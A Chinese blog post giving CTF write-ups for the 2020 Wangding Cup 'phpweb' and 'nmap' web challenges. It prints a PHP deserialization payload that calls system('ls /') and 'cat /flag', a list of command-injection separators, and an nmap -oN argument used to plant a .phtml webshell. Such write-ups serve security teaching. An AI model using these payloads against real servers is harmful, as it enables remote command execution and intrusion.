HacKerQWQ的博客空间

动态调用函数以及nmap用法在网鼎杯的例题

ctf PHP反序列化
Word count: 970Reading time: 4 min
2020/08/12 Share

2020-网鼎杯-phpweb

看到题目只有一个背景图还有规范的时间格式

其次注意到每隔一段时间,时间就会刷新,抓包看看

于是想到了这里有可能存在调用函数的破绽,尝试了几个常用的system(),shell_exec(),passthru()都被拦截了之后,试了试file_get_contents()发现可以,于是把index.php源码down下来了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
<!DOCTYPE html>
<html>
<head>
  <title>phpweb</title>
  <style type="text/css">
        body {
            background:url("bg.jpg") no-repeat;
            background-size: 100%;
      }
    p {
      color: white;
    }
    </style>
</head>
<body>
  <script language=javascript>
    setTimeout("document.form1.submit()",5000)
  </script>
  <p>
  <?php
    $disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch",
      "escapeshellcmd","escapeshellarg","assert","substr_replace","call_user_func_array","call_user_func","array_filter", "array_walk",
      "array_map","registregister_shutdown_function","register_tick_function","filter_var", "filter_var_array", "uasort", "uksort", "array_reduce",
      "array_walk", "array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents"
    );
    function gettime($func, $p) {
      $result = call_user_func($func, $p);
      $a= gettype($result);
      if ($a == "string") {
        return $result;
      } else {
        return "";
      }
    }
    class Test {
      var $p = "Y-m-d h:i:s a";
      var $func = "date";
      function __destruct() {
        if ($this->func != "") {
          echo gettime($this->func, $this->p);
        }
      }
    }
    $func = $_REQUEST["func"];
    $p = $_REQUEST["p"];
    if ($func != null) {
      $func = strtolower($func);
      if (!in_array($func,$disable_fun)) {
        echo gettime($func, $p);
      }else {
        die("Hacker...");
      }
    }
  ?>
  </p>
  <form id=form1 name=form1 action="index.php" method="post">
    <input type="hidden" id="func" name="func" value='date'>
    <input type="hidden" id="p" name="p" value='Y-m-d h:i:s a'>
  </form>
</body>
</html>

通过反序列化绕过黑名单

利用思路

这个php的作用就是,接收传递过来的$func、$p参数,然后对$func进行黑名单过滤,然后使用call_user_func函数,将第一个参数作为回调函数,也就是$fun($p),然后再判断返回的结果是不是string格式的,如果是就输出,不是就返回空白字符串。

这里我们需要特殊注意的是这个__destruct函数,存在即合理,不会无缘无故存在但是没有任何作用,自然而然就想到反序列化,同时黑名单列表里面没有unserialize函数,所以猜想正确。

本地测试:

结果:

说明序列化和反序列化都会调用__destruct()函数

payload

构造payload

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
<?php
class Test {
    var $p = "Y-m-d h:i:s a";
    var $func = "date";
    function __destruct() {
        if ($this->func != "") {
            echo "hello" . "\n";
        }
    }
}
$c = new Test();
$c ->func="system";
$c ->p="ls /";
$result = serialize($c);
echo urlencode($result);

查看flag

1
2
3
4
5
$c = new Test();
$c ->func="system";
$c ->p="cat /flag_9777417";
$result = serialize($c);
echo urlencode($result);

就得到最终flag了

nmap

题目:

index.php是一个输入hostname或者IP地址用于nmap的地方

然后list.php是一个查看结果的地方(存在一个.gitkeep的结果)

点开之后

url有点可疑

1
/result.php?f=.gitkeep

就目前的情况来看有几个方向:index.php里的命令执行,result.php里的文件包含,.git源码泄露,利用nmap参数读入输出指定文件

解法1

1.命令执行:;、|、||、&、&&、%0a、%0d都不行
2.文件包含:随便输入了几个都显示Wrong file name

3..git 源码泄露也不存在,仔细想想也跟题目不符

那么只剩下nmap参数读入文件输出文件了

payload:

之后访问tmp1.txt得到flag:

解法2

上传一句话木马,过滤了php字符串

可以上传 文件名为phtml

payload:’ -oN b.phtml

之后用蚁剑连接就可以看到了

Author:HacKerQWQ

原文链接:https://hackerqwq.github.io/2020/08/12/2020-%E7%BD%91%E9%BC%8E%E6%9D%AF-%E6%9C%B1%E9%9B%80%E7%BB%84-Web/

发表日期:August 12th 2020, 6:52:08 pm

更新日期:April 18th 2021, 12:30:57 am

版权声明:本文采用知识共享署名-非商业性使用 4.0 国际许可协议进行许可

CATALOG
  1. 1. 2020-网鼎杯-phpweb
    1. 1.1. 通过反序列化绕过黑名单
      1. 1.1.1. 利用思路
      2. 1.1.2. payload
  2. 2. nmap
    1. 2.1. 解法1
    2. 2.2. 解法2
Total : 163
2023
2022
2021
2020
ctf PHP反序列化 sql jwt 2021CISCN 文件上传 uncide欺骗 无列名注入 php反射类利用 2021红明谷 输入法取证 盲水印隐写 哈夫曼编码 流量分析 Android md5 shtml 2020CISCN png结构 CRC32 Crypto Java安全 intro 权限提升 Docker CVE Hash php_upload_progress_session hash长度拓展攻击 红蓝对抗 MySQL PHP代码审计 PHP 2021Nep 命令执行 PHP原生类 云函数 JAVA_WEB ThinkPHP 原型链污染 nodejs 源码泄露 SSTI 漏洞分析 渗透测试 代码审计 JAJA XML 漏洞 免杀 机器学习 XSS XXE 硬件安全 社工 编码漏洞 nginx常见文件位置 .htaccess利用 HTTP协议 内网渗透 横向移动 漏洞利用 metasploit 信息收集 CTF PHP伪协议 php pickle 逻辑漏洞 2019CISCN python 多线程 misc图像处理 Nginx LFI redis攻防 提权 C 代码执行 渗透 权限维持 bugs phar反序列化 变量覆盖漏洞 扫描软件 弱类型比较 Django rar伪加密 二维码 文件上传漏洞 文件包含 文件读取漏洞 无参数构造payload 神经网络 红队 SSRF url取反绕过 misc_zip create_function注入 零宽度字符